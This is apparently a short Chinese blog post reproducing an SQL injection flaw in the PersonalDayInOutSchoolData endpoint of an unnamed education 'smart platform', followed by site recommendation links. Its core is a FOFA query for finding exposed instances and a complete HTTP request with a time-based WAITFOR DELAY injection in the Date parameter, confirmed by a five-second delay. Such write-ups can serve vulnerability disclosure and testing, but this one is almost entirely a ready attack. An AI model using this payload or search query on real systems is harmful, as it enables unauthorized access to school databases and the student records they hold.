EDU 某智慧平台 PersonalDayInOutSchoolData SQL注入漏洞复现

OidBoy_G2024-09-23 1:33

FOFA:body="custom/blue/uimaker/easyui.css"

PoC

复制代码 
POST /ashx/APP/InOutSchoolService.ashx?action=PersonalDayInOutSchoolData&Date=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&AccountNo=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Connection: keep-alive

延时5秒

相关推荐
FeelTouch Labs2 小时前
一款代码安全治理平台应该具备的能力
安全
Rytter5 小时前
某气骑士 libtprt.so 反 Frida 机制分析与绕过
android·安全·网络安全
一切皆是因缘际会5 小时前
从概率生成到内生心智:2026大模型瓶颈与下一代AI演进方向
人工智能·安全·ai·架构
@insist1237 小时前
信息安全工程师-入侵检测核心技术、APT 应对与工程实践
网络·安全·软考·信息安全工程师·软件水平考试
计算机安禾8 小时前
【计算机网络】第6篇:虚拟局域网——基于标签的广播域划分及其安全边界
计算机网络·安全·php
FeelTouch Labs10 小时前
开源安全治理体系建设
安全·开源
一拳一个娘娘腔11 小时前
内网权限维持实战体系:从单机寄生到域控信任链的深度解析
网络·安全·信任链
qq 137401861112 小时前
GB/T 19450-2004 纸基平托盘 安全检测 + 质量检测全流程实操指南
功能测试·安全·可用性测试·安全性测试
@insist12313 小时前
信息安全工程师-物理隔离技术基础核心考点解析
开发语言·网络·安全·软考·信息安全工程师·软件水平考试
热门推荐
01要裂开了!ChatGPT要手机号验证了?注册Codex要求验证电话号码怎么办?2026年登陆Codex要手机号验证的解决办法02GitHub 镜像站点03Codex 接入 DeepSeek API 完整配置文档04零基础教你claude code 接入 deepseek V405【AI】2026 年具身智能模型和世界模型总结06裂开!ChatGPT 居然开始要手机号验证,附详细解决方法07几个好用的ip纯净度检测网站08CC-Switch & Claude 基于 Linux 服务器安装使用指南092026年AI前瞻:量子AI、具身智能与科学发现的新纪元10在Windows 11上安装Docker的踩坑记录